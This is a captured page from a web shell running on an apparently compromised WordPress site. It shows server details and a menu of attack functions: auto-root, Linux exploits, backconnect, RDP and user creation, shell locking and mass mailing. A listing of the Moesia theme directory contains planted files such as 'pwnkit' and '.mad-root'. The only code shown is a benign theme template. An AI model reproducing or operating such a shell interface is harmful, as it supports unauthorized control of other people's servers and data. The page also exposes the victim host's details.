Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
moesia /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
404.php
1.12
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
2.97
KB
-rw-r--r--
author-bio.php
1.75
KB
-rw-r--r--
comments.php
2.58
KB
-rw-r--r--
content-large.php
2.33
KB
-rw-r--r--
content-none.php
1.04
KB
-rw-r--r--
content-page.php
877
B
-rw-r--r--
content-project.php
823
B
-rw-r--r--
content-search.php
1.94
KB
-rw-r--r--
content-single.php
2.33
KB
-rw-r--r--
content.php
2.53
KB
-rw-r--r--
footer.php
1.05
KB
-rw-r--r--
functions.php
14.26
KB
-rw-r--r--
header.php
4.17
KB
-rw-r--r--
home.php
1.14
KB
-rw-r--r--
index.php
1.07
KB
-rw-r--r--
license.txt
14.69
KB
-rw-r--r--
page.php
849
B
-rw-r--r--
page_employees.php
2.66
KB
-rw-r--r--
page_front-page.php
391
B
-rw-r--r--
page_fullwidth.php
600
B
-rw-r--r--
page_services.php
1.49
KB
-rw-r--r--
page_testimonials.php
1.58
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
3.17
KB
-rw-r--r--
screenshot.png
528.3
KB
-rw-r--r--
search.php
1.02
KB
-rw-r--r--
searchform.php
673
B
-rw-r--r--
sidebar-footer.php
728
B
-rw-r--r--
sidebar.php
274
B
-rw-r--r--
single.php
940
B
-rw-r--r--
style.css
41.64
KB
-rw-r--r--
styles.php
22.7
KB
-rw-r--r--
wpml-config.xml
313
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : archive.php
<?php /** * The template for displaying archive pages. * * Learn more: http://codex.wordpress.org/Template_Hierarchy * * @package Moesia */ get_header(); ?> <section id="primary" class="content-area"> <main id="main" class="site-main" role="main"> <?php if ( have_posts() ) : ?> <header class="page-header"> <h1 class="page-title"> <?php if ( is_category() ) : single_cat_title(); elseif ( is_tag() ) : single_tag_title(); elseif ( is_post_type_archive() ) : post_type_archive_title(); elseif ( is_author() ) : printf( __( 'Author: %s', 'moesia' ), '<span class="vcard">' . get_the_author() . '</span>' ); elseif ( is_day() ) : printf( __( 'Day: %s', 'moesia' ), '<span>' . get_the_date() . '</span>' ); elseif ( is_month() ) : printf( __( 'Month: %s', 'moesia' ), '<span>' . get_the_date( _x( 'F Y', 'monthly archives date format', 'moesia' ) ) . '</span>' ); elseif ( is_year() ) : printf( __( 'Year: %s', 'moesia' ), '<span>' . get_the_date( _x( 'Y', 'yearly archives date format', 'moesia' ) ) . '</span>' ); elseif ( is_tax( 'post_format', 'post-format-aside' ) ) : _e( 'Asides', 'moesia' ); elseif ( is_tax( 'post_format', 'post-format-gallery' ) ) : _e( 'Galleries', 'moesia' ); elseif ( is_tax( 'post_format', 'post-format-image' ) ) : _e( 'Images', 'moesia' ); elseif ( is_tax( 'post_format', 'post-format-video' ) ) : _e( 'Videos', 'moesia' ); elseif ( is_tax( 'post_format', 'post-format-quote' ) ) : _e( 'Quotes', 'moesia' ); elseif ( is_tax( 'post_format', 'post-format-link' ) ) : _e( 'Links', 'moesia' ); elseif ( is_tax( 'post_format', 'post-format-status' ) ) : _e( 'Statuses', 'moesia' ); elseif ( is_tax( 'post_format', 'post-format-audio' ) ) : _e( 'Audios', 'moesia' ); elseif ( is_tax( 'post_format', 'post-format-chat' ) ) : _e( 'Chats', 'moesia' ); else : _e( 'Archives', 'moesia' ); endif; ?> </h1> <?php // Show an optional term description. $term_description = term_description(); if ( ! empty( $term_description ) ) : printf( '<div class="taxonomy-description">%s</div>', $term_description ); endif; ?> </header><!-- .page-header --> <?php /* Start the Loop */ ?> <?php while ( have_posts() ) : the_post(); ?> <?php /* Include the Post-Format-specific template for the content. * If you want to override this in a child theme, then include a file * called content-___.php (where ___ is the Post Format name) and that will be used instead. */ get_template_part( 'content', get_post_format() ); ?> <?php endwhile; ?> <?php moesia_paging_nav(); ?> <?php else : ?> <?php get_template_part( 'content', 'none' ); ?> <?php endif; ?> </main><!-- #main --> </section><!-- #primary --> <?php get_sidebar(); ?> <?php get_footer(); ?>
Close